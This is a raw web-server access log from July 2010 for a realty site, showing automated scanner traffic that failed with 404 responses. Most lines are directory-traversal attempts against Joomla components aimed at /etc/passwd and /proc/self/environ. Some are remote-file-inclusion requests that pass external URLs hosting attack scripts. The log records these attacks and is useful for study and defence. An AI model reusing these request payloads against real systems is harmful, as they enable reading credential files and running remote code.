92.43.201.28 - - [29/Jul/2010:01:27:34 -0700] "POST /logs/access.log/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:01:27:34 -0700] "POST /e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
92.43.201.28 - - [29/Jul/2010:01:27:34 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:28:15 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:28:15 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:28:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:28:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:01:30:05 -0700] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:01:30:05 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:30:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:30:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:30:45 -0700] "GET /logs/access.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:30:56 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:30:46 -0700] "GET /logs////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:32:46 -0700] "GET /logs/access.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:32:57 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:32:46 -0700] "GET /logs////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
64.8.98.179 - - [29/Jul/2010:01:33:32 -0700] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.116.59.107 - - [29/Jul/2010:01:34:02 -0700] "GET /logs/access.log//web2/index2.php?option=com_ckforms&controller=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
209.116.59.107 - - [29/Jul/2010:01:34:13 -0700] "GET /logs//web2/index2.php?option=com_ckforms&controller=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
209.116.59.107 - - [29/Jul/2010:01:34:13 -0700] "GET /web2/index2.php?option=com_ckforms&controller=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:34:13 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:34:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:34:14 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:34:22 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:34:22 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:34:23 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.143.81.22 - - [29/Jul/2010:01:35:05 -0700] "GET /logs/access.log/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
83.143.81.22 - - [29/Jul/2010:01:34:54 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
83.143.81.22 - - [29/Jul/2010:01:34:55 -0700] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:35:00 -0700] "GET /logs/access.log////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:35:12 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:01:35:01 -0700] "GET /logs////index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:01:35:31 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
183.179.57.11 - - [29/Jul/2010:01:37:23 -0700] "GET /logs/access_100427.log HTTP/1.0" 404 - "-" "-" "www.prosouthrealty.com"
183.179.57.11 - - [29/Jul/2010:01:37:24 -0700] "GET /logs/access_100427.log HTTP/1.0" 404 - "-" "-" "www.prosouthrealty.com"
183.179.57.11 - - [29/Jul/2010:01:37:25 -0700] "GET /logs/access_100427.log HTTP/1.0" 404 - "-" "-" "www.prosouthrealty.com"
183.179.57.11 - - [29/Jul/2010:01:37:37 -0700] "GET /logs/access_100427.log HTTP/1.0" 404 - "-" "-" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:39:28 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:39:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:40:58 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:41:12 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:41:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:41:12 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:01:44:09 -0700] "GET /jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:01:46:01 -0700] "GET /jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
83.143.81.22 - - [29/Jul/2010:01:46:15 -0700] "GET /logs/access_100622.log/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:01:47:49 -0700] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:01:47:38 -0700] "GET /jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
83.243.9.110 - - [29/Jul/2010:01:52:07 -0700] "GET /logs/access_100624.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:01:52:40 -0700] "GET /jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:01:56:28 -0700] "GET /logs/access.log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:01:56:17 -0700] "GET /jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:01:56:28 -0700] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
64.8.98.179 - - [29/Jul/2010:01:57:00 -0700] "GET /logs/access_100623.log/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
64.8.98.179 - - [29/Jul/2010:01:56:49 -0700] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
64.8.98.179 - - [29/Jul/2010:01:56:49 -0700] "GET /logs/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
87.54.38.148 - - [29/Jul/2010:01:59:01 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
87.54.38.148 - - [29/Jul/2010:01:59:49 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:02:01:27 -0700] "GET /logs/access.log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:02:01:17 -0700] "GET /jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:02:01:18 -0700] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
87.238.162.146 - - [29/Jul/2010:02:05:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:02:08:29 -0700] "GET /logs/access.log/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:02:08:21 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:02:08:21 -0700] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:02:09:20 -0700] "GET /logs/access.log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:02:09:10 -0700] "GET /jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:02:09:11 -0700] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:02:17:34 -0700] "GET /logs/access_100624.log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
200.175.239.226 - - [29/Jul/2010:02:23:44 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
200.175.239.226 - - [29/Jul/2010:02:23:55 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
200.175.239.226 - - [29/Jul/2010:02:23:44 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
87.238.162.146 - - [29/Jul/2010:02:32:47 -0700] "POST /logs/access_100623.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.prosouthrealty.com"
87.238.162.146 - - [29/Jul/2010:02:32:47 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.prosouthrealty.com"
87.238.162.146 - - [29/Jul/2010:02:32:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.prosouthrealty.com"
93.158.149.32 - - [29/Jul/2010:02:36:30 -0700] "GET /logs/access_100707.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:02:36:36 -0700] "GET /logs/access_100624.log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:02:37:51 -0700] "GET /logs/access_100622.log/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:02:39:06 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:02:39:14 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:02:39:14 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:02:39:54 -0700] "GET /logs/access.log//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:02:39:54 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:02:40:05 -0700] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:02:39:55 -0700] "GET /logs/access.log//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:02:39:56 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:02:39:56 -0700] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
200.175.239.226 - - [29/Jul/2010:02:40:54 -0700] "GET /logs/scripts.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:02:43:24 -0700] "GET /logs/access.log//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:02:43:24 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:02:43:14 -0700] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
212.174.28.46 - - [29/Jul/2010:02:44:15 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
212.174.28.46 - - [29/Jul/2010:02:44:15 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
212.174.28.46 - - [29/Jul/2010:02:44:15 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:02:44:19 -0700] "GET /logs/access_100624.log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
200.175.239.226 - - [29/Jul/2010:02:47:57 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:02:53:45 -0700] "GET /logs/access.log/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:02:53:34 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
72.249.108.140 - - [29/Jul/2010:02:53:34 -0700] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:01:20 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:03:01:29 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:01:32 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:03:31 -0700] "GET /logs/access.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:03:20 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:03:31 -0700] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:03:03:23 -0700] "GET /logs/access.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:03:03:34 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
